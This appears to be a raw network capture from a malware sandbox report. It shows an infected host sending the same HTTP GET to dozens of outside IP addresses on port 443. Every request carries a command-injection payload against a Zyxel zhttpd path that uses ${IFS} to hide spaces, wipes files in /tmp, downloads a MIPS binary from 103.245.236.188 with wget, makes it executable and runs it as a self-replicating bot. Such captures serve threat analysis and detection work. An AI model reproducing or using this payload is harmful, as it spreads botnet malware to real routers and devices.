                                                Jan 12, 2024 18:16:39.836647034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8594192.168.2.2351750123.121.182.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836689949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8595192.168.2.2342748204.83.166.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836734056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8596192.168.2.2344398201.182.167.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836791039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8597192.168.2.2333144223.206.195.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836838007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8598192.168.2.2342632207.20.115.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836869955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8599192.168.2.235722239.20.80.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836888075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8600192.168.2.234612823.42.148.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836922884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8601192.168.2.2342346160.15.190.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.836957932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8602192.168.2.2341880124.78.4.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837034941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8603192.168.2.2344710140.73.98.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837037086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8604192.168.2.235201097.52.230.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837089062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8605192.168.2.2343670161.97.112.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837136984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8606192.168.2.2340152170.248.114.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837142944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8607192.168.2.235456820.229.52.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837191105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8608192.168.2.2334890200.2.127.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837233067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8609192.168.2.2349766157.165.39.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837285995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8610192.168.2.2340928213.91.251.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837320089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8611192.168.2.2333238111.225.199.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837357044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8612192.168.2.2343714106.149.186.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837405920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8613192.168.2.235948487.178.31.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837449074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8614192.168.2.2355870198.117.98.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837496042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8615192.168.2.235998883.115.167.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837527990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8616192.168.2.2333044101.27.173.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837574959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8617192.168.2.235637299.60.66.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837609053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8618192.168.2.2333364140.55.210.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837656021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8619192.168.2.234769627.19.165.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837685108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8620192.168.2.234821486.140.136.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837712049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8621192.168.2.2355458186.97.246.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837752104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8622192.168.2.2358336144.175.227.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837801933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8623192.168.2.2336656191.254.110.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837836981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8624192.168.2.2338504203.107.167.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837898016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8625192.168.2.2335160171.10.83.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837934017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8626192.168.2.234956246.6.207.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.837960958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8627192.168.2.2340554117.100.57.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838001966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8628192.168.2.2354714201.224.169.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838037014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8629192.168.2.234491459.253.85.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838094950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8630192.168.2.233873836.254.227.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838150978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8631192.168.2.2343570115.7.22.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838165998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8632192.168.2.2355722191.84.177.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838223934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8633192.168.2.2354270218.48.166.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838243961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8634192.168.2.2347846118.24.117.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838268042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8635192.168.2.2356648119.166.132.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838299990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8636192.168.2.2350642182.20.131.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838345051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8637192.168.2.2355666158.179.102.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838398933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8638192.168.2.23469762.5.11.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838432074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8639192.168.2.2358012152.147.128.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838463068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8640192.168.2.2356704142.47.39.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838496923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8641192.168.2.235617847.67.236.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838565111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8642192.168.2.2357658147.6.43.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838603020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8643192.168.2.2337808182.16.227.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838618040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8644192.168.2.2337690152.67.28.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838664055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8645192.168.2.234998471.21.73.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838691950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8646192.168.2.2340756169.231.94.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838748932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8647192.168.2.2339104130.158.2.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838808060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8648192.168.2.2347066118.137.33.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838836908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8649192.168.2.2354490158.184.145.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838845968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8650192.168.2.234573683.162.12.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838879108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8651192.168.2.2338712165.237.244.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838921070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8652192.168.2.2350570186.64.53.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.838985920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8653192.168.2.2335088118.186.21.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839030981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8654192.168.2.23368981.226.166.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839063883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8655192.168.2.2341884198.165.255.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839123011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8656192.168.2.234392694.32.84.102443
                                                TimestampBytes transferredDirectionData
